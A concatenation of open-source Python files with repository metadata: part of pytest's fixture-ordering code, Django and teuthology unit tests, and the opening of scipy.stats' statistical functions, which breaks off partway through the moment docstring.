return reorder_items_atscope(items, set(), argkeys_cache, 0)
def reorder_items_atscope(items, ignore, argkeys_cache, scopenum):
if scopenum >= scopenum_function or len(items) < 3:
return items
items_done = []
while 1:
items_before, items_same, items_other, newignore = \
slice_items(items, ignore, argkeys_cache[scopenum])
items_before = reorder_items_atscope(
items_before, ignore, argkeys_cache,scopenum+1)
if items_same is None:
# nothing to reorder in this scope
assert items_other is None
return items_done + items_before
items_done.extend(items_before)
items = items_same + items_other
ignore = newignore
def slice_items(items, ignore, scoped_argkeys_cache):
# we pick the first item which uses a fixture instance in the
# requested scope and which we haven't seen yet. We slice the input
# items list into a list of items_nomatch, items_same and
# items_other
if scoped_argkeys_cache: # do we need to do work at all?
it = iter(items)
# first find a slicing key
for i, item in enumerate(it):
argkeys = scoped_argkeys_cache.get(item)
if argkeys is not None:
argkeys = argkeys.difference(ignore)
if argkeys: # found a slicing key
slicing_argkey = argkeys.pop()
items_before = items[:i]
items_same = [item]
items_other = []
# now slice the remainder of the list
for item in it:
argkeys = scoped_argkeys_cache.get(item)
if argkeys and slicing_argkey in argkeys and \
slicing_argkey not in ignore:
items_same.append(item)
else:
items_other.append(item)
newignore = ignore.copy()
newignore.add(slicing_argkey)
return (items_before, items_same, items_other, newignore)
return items, None, None, None
def get_parametrized_fixture_keys(item, scopenum):
""" return list of keys for all parametrized arguments which match
the specified scope. """
assert scopenum < scopenum_function # function
try:
cs = item.callspec
except AttributeError:
pass
else:
# cs.indictes.items() is random order of argnames but
# then again different functions (items) can change order of
# arguments so it doesn't matter much probably
for argname, param_index in cs.indices.items():
if cs._arg2scopenum[argname] != scopenum:
continue
if scopenum == 0: # session
key = (argname, param_index)
elif scopenum == 1: # module
key = (argname, param_index, item.fspath)
elif scopenum == 2: # class
key = (argname, param_index, item.fspath, item.cls)
yield key
def xunitsetup(obj, name):
meth = getattr(obj, name, None)
if getfixturemarker(meth) is None:
return meth
def getfixturemarker(obj):
""" return fixturemarker or None if it doesn't exist or raised
exceptions."""
try:
return getattr(obj, "_pytestfixturefunction", None)
except KeyboardInterrupt:
raise
except Exception:
# some objects raise errors like request (from flask import request)
# we don't expect them to be fixture functions
return None
scopename2class = {
'class': Class,
'module': Module,
'function': pytest.Item,
}
def get_scope_node(node, scope):
cls = scopename2class.get(scope)
if cls is None:
if scope == "session":
return node.session
raise ValueError("unknown scope")
return node.getparent(cls)
|
{
"content_hash": "8f3c1678aaeec2f60fb2741e47ae42b3",
"timestamp": "",
"source": "github",
"line_count": 2169,
"max_line_length": 108,
"avg_line_length": 38.67542646380821,
"alnum_prop": 0.6022029635104367,
"repo_name": "pelme/pytest",
"id": "88c7d1a39d8a529f81df34d46925dc8fe8288646",
"size": "83887",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_pytest/python.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1842"
},
{
"name": "Makefile",
"bytes": "916"
},
{
"name": "PowerShell",
"bytes": "5987"
},
{
"name": "Python",
"bytes": "1001588"
},
{
"name": "Shell",
"bytes": "282"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.utils.timezone import get_current_timezone
from app.utils import *
from app.myblog.models import Article, Classification
class TestEncodeJson(TestCase):
def test_ecnode(self):
res = encodejson(1, {})
self.assertIsInstance(res ,str)
class TestCreateRandom(TestCase):
def test_create(self):
res = create_random_str(10)
self.assertEqual(len(res), 10)
res = create_random_str(62)
self.assertEqual(len(res), 62)
res = create_random_str(63)
self.assertEqual(res, 'too long str')
def test_format(self):
res = create_random_str(60)
for itm in ['+', '-', '_', '=', '|', '!', '?', '`', '~', '@', '#', '$', '%', '^', '&', '*', '(', ')']:
self.assertNotIn(itm, res)
class TestString2Datetime(TestCase):
def test_convert(self):
sample = '2011-1-1 19:25:01'
res = string_to_datetime(sample)
self.assertIsInstance(res, datetime.datetime)
self.assertEqual(res.second, 1)
self.assertEqual(res.minute, 25)
self.assertEqual(res.hour, 19)
self.assertEqual(res.day, 1)
self.assertEqual(res.month, 1)
self.assertEqual(res.year, 2011)
def test_format(self):
sample = '2015/1/1 23-12-11'
format_str = '%Y/%m/%d %H-%M-%S'
res = string_to_datetime(sample, format_str)
self.assertIsInstance(res, datetime.datetime)
class TestDatetime2Timestamp(TestCase):
def test_convert(self):
sample = datetime.datetime.now()
res = datetime_to_timestamp(sample)
self.assertIsInstance(res, float)
sample.replace(tzinfo=get_current_timezone())
res = datetime_to_timestamp(sample)
self.assertIsInstance(res, float)
class TestDatetime2String(TestCase):
def test_convert(self):
sample = string_to_datetime('2011-1-1 19:25:01')
res = datetime_to_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01')
sample.replace(tzinfo=get_current_timezone())
res = datetime_to_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01')
class TestDatetime2UtcString(TestCase):
def test_convert(self):
sample = string_to_datetime('2011-1-1 19:25:01')
res = datetime_to_utc_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01+08:00')
class TestModeSerializer(TestCase):
def setUp(self):
classify = Classification.objects.create(c_name='test')
art = Article.objects.create(caption='article',
sub_caption='sub_article',
classification=classify,
content='article test')
art1 = Article.objects.create(caption='article1',
sub_caption='sub_article',
classification=classify,
content='article test')
def test_serializer(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art)
self.assertIsInstance(serial, dict)
serial = model_serializer(art, serializer='json')
self.assertIsInstance(serial, str)
serial = model_serializer(art, serializer='xml')
self.assertIn('xml version="1.0', serial)
def test_serializer_list(self):
art_list = Article.objects.all()
serial = model_serializer(art_list)
self.assertIsInstance(serial, list)
serial = model_serializer(art_list, serializer='json')
self.assertIsInstance(serial, str)
def test_include(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, include_attr=['caption', 'content'])
self.assertIn('caption', serial)
self.assertNotIn('create_time', serial)
def test_except(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, except_attr=['caption', 'content'])
self.assertNotIn('caption', serial)
self.assertIn('create_time', serial)
def test_include_except(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, include_attr=['caption', 'content'], except_attr=['content'])
self.assertIn('caption', serial)
self.assertNotIn('content', serial)
class TestCreateVerifyPic(TestCase):
def test_create(self):
img, code = create_verify_code()
self.assertIsInstance(img, str)
self.assertIsInstance(code, str)
|
{
"content_hash": "cca036fde1a653baec31b280e0478f0d",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 110,
"avg_line_length": 36.26984126984127,
"alnum_prop": 0.613129102844639,
"repo_name": "madarou/angular-django",
"id": "b7bc6922332a89a585b6ffbc09e0aa106a795778",
"size": "4570",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_utils.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "356826"
},
{
"name": "HTML",
"bytes": "77340"
},
{
"name": "Python",
"bytes": "1816255"
}
],
"symlink_target": ""
}
|
import pytest
from .. import config
class TestYamlConfig(object):
def setup(self):
self.test_class = config.YamlConfig
def test_set_multiple(self):
conf_obj = self.test_class()
conf_obj.foo = 'foo'
conf_obj.bar = 'bar'
assert conf_obj.foo == 'foo'
assert conf_obj.bar == 'bar'
assert conf_obj.to_dict()['foo'] == 'foo'
def test_from_dict(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
assert conf_obj.foo == 'bar'
def test_contains(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
conf_obj.bar = "foo"
assert "bar" in conf_obj
assert "foo" in conf_obj
assert "baz" not in conf_obj
def test_to_dict(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
assert conf_obj.to_dict() == in_dict
def test_from_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.foo == 'bar'
def test_to_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.to_str() == in_str
def test_update(self):
conf_obj = self.test_class(dict())
conf_obj.foo = 'foo'
conf_obj.bar = 'bar'
conf_obj.update(dict(bar='baz'))
assert conf_obj.foo == 'foo'
assert conf_obj.bar == 'baz'
def test_delattr(self):
conf_obj = self.test_class()
conf_obj.foo = 'bar'
assert conf_obj.foo == 'bar'
del conf_obj.foo
assert conf_obj.foo is None
def test_assignment(self):
conf_obj = self.test_class()
conf_obj["foo"] = "bar"
assert conf_obj["foo"] == "bar"
assert conf_obj.foo == "bar"
def test_used_with_update(self):
d = dict()
conf_obj = self.test_class.from_dict({"foo": "bar"})
d.update(conf_obj)
assert d["foo"] == "bar"
class TestTeuthologyConfig(TestYamlConfig):
def setup(self):
self.test_class = config.TeuthologyConfig
def test_get_ceph_git_base_default(self):
conf_obj = self.test_class()
conf_obj.yaml_path = ''
conf_obj.load()
assert conf_obj.ceph_git_base_url == "https://github.com/ceph/"
def test_set_ceph_git_base_via_private(self):
conf_obj = self.test_class()
conf_obj._conf['ceph_git_base_url'] = \
"git://ceph.com/"
assert conf_obj.ceph_git_base_url == "git://ceph.com/"
def test_set_nonstandard(self):
conf_obj = self.test_class()
conf_obj.something = 'something else'
assert conf_obj.something == 'something else'
class TestJobConfig(TestYamlConfig):
def setup(self):
self.test_class = config.JobConfig
class TestFakeNamespace(TestYamlConfig):
def setup(self):
self.test_class = config.FakeNamespace
def test_docopt_dict(self):
"""
Tests if a dict in the format that docopt returns can
be parsed correctly.
"""
d = {
"--verbose": True,
"--an-option": "some_option",
"<an_arg>": "the_arg",
"something": "some_thing",
}
conf_obj = self.test_class(d)
assert conf_obj.verbose
assert conf_obj.an_option == "some_option"
assert conf_obj.an_arg == "the_arg"
assert conf_obj.something == "some_thing"
def test_config(self):
"""
Tests that a teuthology_config property is automatically added
by misc.read_config.
"""
conf_obj = self.test_class(dict(foo="bar"))
assert conf_obj["foo"] == "bar"
assert conf_obj.foo == "bar"
# teuthology_config needs to be a dict because all
# of the tasks expect it to be
assert isinstance(conf_obj.teuthology_config, dict)
def test_getattr(self):
conf_obj = self.test_class.from_dict({"foo": "bar"})
result = getattr(conf_obj, "not_there", "default")
assert result == "default"
result = getattr(conf_obj, "foo")
assert result == "bar"
def test_none(self):
conf_obj = self.test_class.from_dict(dict(null=None))
assert conf_obj.null is None
def test_delattr(self):
conf_obj = self.test_class()
conf_obj.foo = 'bar'
assert conf_obj.foo == 'bar'
del conf_obj.foo
with pytest.raises(AttributeError):
conf_obj.foo
def test_to_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.to_str() == "{'foo': 'bar'}"
|
{
"content_hash": "92488752ae30ee56cdf7dc27f67cf356",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 71,
"avg_line_length": 30.346153846153847,
"alnum_prop": 0.5648500211237854,
"repo_name": "yghannam/teuthology",
"id": "1bea8b0d7524fba38028c36e7d295271b6391339",
"size": "4734",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "teuthology/test/test_config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "635323"
},
{
"name": "Shell",
"bytes": "9364"
}
],
"symlink_target": ""
}
|
"""
A collection of basic statistical functions for Python. The function
names appear below.
Some scalar functions defined here are also available in the scipy.special
package where they work on arbitrary sized arrays.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful.
Central Tendency
----------------
.. autosummary::
:toctree: generated/
gmean
hmean
mode
Moments
-------
.. autosummary::
:toctree: generated/
moment
variation
skew
kurtosis
normaltest
Altered Versions
----------------
.. autosummary::
:toctree: generated/
tmean
tvar
tstd
tsem
describe
Frequency Stats
---------------
.. autosummary::
:toctree: generated/
itemfreq
scoreatpercentile
percentileofscore
cumfreq
relfreq
Variability
-----------
.. autosummary::
:toctree: generated/
obrientransform
sem
zmap
zscore
gstd
iqr
median_absolute_deviation
Trimming Functions
------------------
.. autosummary::
:toctree: generated/
trimboth
trim1
Correlation Functions
---------------------
.. autosummary::
:toctree: generated/
pearsonr
fisher_exact
spearmanr
pointbiserialr
kendalltau
weightedtau
linregress
theilslopes
multiscale_graphcorr
Inferential Stats
-----------------
.. autosummary::
:toctree: generated/
ttest_1samp
ttest_ind
ttest_ind_from_stats
ttest_rel
chisquare
power_divergence
ks_2samp
epps_singleton_2samp
mannwhitneyu
ranksums
wilcoxon
kruskal
friedmanchisquare
brunnermunzel
combine_pvalues
Statistical Distances
---------------------
.. autosummary::
:toctree: generated/
wasserstein_distance
energy_distance
ANOVA Functions
---------------
.. autosummary::
:toctree: generated/
f_oneway
Support Functions
-----------------
.. autosummary::
:toctree: generated/
rankdata
rvs_ratio_uniforms
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
from __future__ import division, print_function, absolute_import
import warnings
import sys
import math
if sys.version_info >= (3, 5):
from math import gcd
else:
from fractions import gcd
from collections import namedtuple
import numpy as np
from numpy import array, asarray, ma
from scipy._lib.six import callable, string_types
from scipy.spatial.distance import cdist
from scipy.ndimage import measurements
from scipy._lib._version import NumpyVersion
from scipy._lib._util import _lazywhere, check_random_state, MapWrapper
import scipy.special as special
from scipy import linalg
from . import distributions
from . import mstats_basic
from ._stats_mstats_common import (_find_repeats, linregress, theilslopes,
siegelslopes)
from ._stats import (_kendall_dis, _toint64, _weightedrankedtau,
_local_correlations)
from ._rvs_sampling import rvs_ratio_uniforms
from ._hypotests import epps_singleton_2samp
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment', 'variation',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore',
'cumfreq', 'relfreq', 'obrientransform',
'sem', 'zmap', 'zscore', 'iqr', 'gstd', 'median_absolute_deviation',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean', 'f_oneway',
'PearsonRConstantInputWarning', 'PearsonRNearConstantInputWarning',
'pearsonr', 'fisher_exact', 'spearmanr', 'pointbiserialr',
'kendalltau', 'weightedtau',
'multiscale_graphcorr',
'linregress', 'siegelslopes', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel', 'kstest',
'chisquare', 'power_divergence', 'ks_2samp', 'mannwhitneyu',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'rankdata', 'rvs_ratio_uniforms',
'combine_pvalues', 'wasserstein_distance', 'energy_distance',
'brunnermunzel', 'epps_singleton_2samp']
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _contains_nan(a, nan_policy='propagate'):
policies = ['propagate', 'raise', 'omit']
if nan_policy not in policies:
raise ValueError("nan_policy must be one of {%s}" %
', '.join("'%s'" % s for s in policies))
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# This can happen when attempting to sum things which are not
# numbers (e.g. as in the function `mode`). Try an alternative method:
try:
contains_nan = np.nan in set(a.ravel())
except TypeError:
# Don't know what to do. Fall back to omitting nan values and
# issue a warning.
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly checked for nan "
"values. nan values will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return (contains_nan, nan_policy)
def gmean(a, axis=0, dtype=None):
"""
Compute the geometric mean along the specified axis.
Return the geometric average of the array elements.
That is: n-th root of (x1 * x2 * ... * xn)
Parameters
----------
a : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the geometric mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If dtype is not specified, it defaults to the
dtype of a, unless a has an integer dtype with a precision less than
that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
gmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
hmean : Harmonic mean
Notes
-----
The geometric average is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity because masked
arrays automatically mask any non-finite values.
Examples
--------
>>> from scipy.stats import gmean
>>> gmean([1, 4])
2.0
>>> gmean([1, 2, 3, 4, 5, 6, 7])
3.3800151591412964
"""
if not isinstance(a, np.ndarray):
# if not an ndarray object attempt to convert it
log_a = np.log(np.array(a, dtype=dtype))
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
log_a = np.log(np.ma.asarray(a, dtype=dtype))
else:
log_a = np.log(np.asarray(a, dtype=dtype))
else:
log_a = np.log(a)
return np.exp(log_a.mean(axis=axis))
def hmean(a, axis=0, dtype=None):
"""
Calculate the harmonic mean along the specified axis.
That is: n / (1/x1 + 1/x2 + ... + 1/xn)
Parameters
----------
a : array_like
Input array, masked array or object that can be converted to an array.
axis : int or None, optional
Axis along which the harmonic mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If `dtype` is not specified, it defaults to the
dtype of `a`, unless `a` has an integer `dtype` with a precision less
than that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
hmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
gmean : Geometric mean
Notes
-----
The harmonic mean is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity.
Examples
--------
>>> from scipy.stats import hmean
>>> hmean([1, 4])
1.6000000000000001
>>> hmean([1, 2, 3, 4, 5, 6, 7])
2.6997245179063363
"""
if not isinstance(a, np.ndarray):
a = np.array(a, dtype=dtype)
if np.all(a >= 0):
# Harmonic mean only defined if greater than or equal to to zero.
if isinstance(a, np.ma.MaskedArray):
size = a.count(axis)
else:
if axis is None:
a = a.ravel()
size = a.shape[0]
else:
size = a.shape[axis]
with np.errstate(divide='ignore'):
return size / np.sum(1.0 / a, axis=axis, dtype=dtype)
else:
raise ValueError("Harmonic mean only defined if all elements greater "
"than or equal to zero")
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
def mode(a, axis=0, nan_policy='propagate'):
"""
Return an array of the modal (most common) value in the passed array.
If there is more than one such value, only the smallest is returned.
The bin-count for the modal bins is also returned.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mode : ndarray
Array of modal values.
count : ndarray
Array of counts for each mode.
Examples
--------
>>> a = np.array([[6, 8, 3, 0],
... [3, 2, 1, 7],
... [8, 1, 8, 4],
... [5, 3, 0, 5],
... [4, 7, 5, 9]])
>>> from scipy import stats
>>> stats.mode(a)
(array([[3, 1, 0, 0]]), array([[1, 1, 1, 1]]))
To get mode of whole array, specify ``axis=None``:
>>> stats.mode(a, axis=None)
(array([3]), array([3]))
"""
a, axis = _chk_asarray(a, axis)
if a.size == 0:
return ModeResult(np.array([]), np.array([]))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.mode(a, axis)
if a.dtype == object and np.nan in set(a.ravel()):
# Fall back to a slower method since np.unique does not work with NaN
scores = set(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape, dtype=a.dtype)
oldcounts = np.zeros(testshape, dtype=int)
for score in scores:
template = (a == score)
counts = np.expand_dims(np.sum(template, axis), axis)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return ModeResult(mostfrequent, oldcounts)
def _mode1D(a):
vals, cnts = np.unique(a, return_counts=True)
return vals[cnts.argmax()], cnts.max()
# np.apply_along_axis will convert the _mode1D tuples to a numpy array, casting types in the process
# This recreates the results without that issue
# View of a, rotated so the requested axis is last
in_dims = list(range(a.ndim))
a_view = np.transpose(a, in_dims[:axis] + in_dims[axis+1:] + [axis])
inds = np.ndindex(a_view.shape[:-1])
modes = np.empty(a_view.shape[:-1], dtype=a.dtype)
counts = np.zeros(a_view.shape[:-1], dtype=np.int)
for ind in inds:
modes[ind], counts[ind] = _mode1D(a_view[ind])
newshape = list(a.shape)
newshape[axis] = 1
return ModeResult(modes.reshape(newshape), counts.reshape(newshape))
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
"""
Compute the trimmed mean.
This function finds the arithmetic mean of given values, ignoring values
outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None (default), then all
values are used. Either of the limit values in the tuple can also be
None representing a half-open interval.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to compute test. Default is None.
Returns
-------
tmean : float
Trimmed mean.
See Also
--------
trim_mean : Returns mean after trimming a proportion from both tails.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmean(x)
9.5
>>> stats.tmean(x, (3,17))
10.0
"""
a = asarray(a)
if limits is None:
return np.mean(a, None)
am = _mask_to_limits(a.ravel(), limits, inclusive)
return am.mean(axis=axis)
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed variance.
This function computes the sample variance of an array of values,
while ignoring values which are outside of given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tvar : float
Trimmed variance.
Notes
-----
`tvar` computes the unbiased sample variance, i.e. it uses a correction
factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tvar(x)
35.0
>>> stats.tvar(x, (3,17))
20.0
"""
a = asarray(a)
a = a.astype(float)
if limits is None:
return a.var(ddof=ddof, axis=axis)
am = _mask_to_limits(a, limits, inclusive)
amnan = am.filled(fill_value=np.nan)
return np.nanvar(amnan, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed minimum.
This function finds the miminum value of an array `a` along the
specified axis, but only considering values greater than a specified
lower limit.
Parameters
----------
a : array_like
Array of values.
lowerlimit : None or float, optional
Values in the input array less than the given limit will be ignored.
When lowerlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the lower limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmin : float, int or ndarray
Trimmed minimum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmin(x)
0
>>> stats.tmin(x, 13)
13
>>> stats.tmin(x, 13, inclusive=False)
14
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.minimum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed maximum.
This function computes the maximum value of an array along a given axis,
while ignoring values larger than a specified upper limit.
Parameters
----------
a : array_like
Array of values.
upperlimit : None or float, optional
Values in the input array greater than the given limit will be ignored.
When upperlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the upper limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmax : float, int or ndarray
Trimmed maximum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmax(x)
19
>>> stats.tmax(x, 13)
13
>>> stats.tmax(x, 13, inclusive=False)
12
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (None, upperlimit), (False, inclusive))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.maximum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed sample standard deviation.
This function finds the sample standard deviation of given values,
ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tstd : float
Trimmed sample standard deviation.
Notes
-----
`tstd` computes the unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tstd(x)
5.9160797830996161
>>> stats.tstd(x, (3,17))
4.4721359549995796
"""
return np.sqrt(tvar(a, limits, inclusive, axis, ddof))
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed standard error of the mean.
This function finds the standard error of the mean for given
values, ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tsem : float
Trimmed standard error of the mean.
Notes
-----
`tsem` uses unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tsem(x)
1.3228756555322954
>>> stats.tsem(x, (3,17))
1.1547005383792515
"""
a = np.asarray(a).ravel()
if limits is None:
return a.std(ddof=ddof) / np.sqrt(a.size)
am = _mask_to_limits(a, limits, inclusive)
sd = np.sqrt(np.ma.var(am, ddof=ddof, axis=axis))
return sd / np.sqrt(am.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
r"""
Calculate the nth moment about the mean for a sample.
A moment is a specific quantitative measure of the shape of a set of
points. It is often used to calculate coefficients of skewness and kurtosis
due to its close relationship with them.
Parameters
----------
a : array_like
Input array.
moment : int or array_like of ints, optional
Order of central moment that is returned. Default is 1.
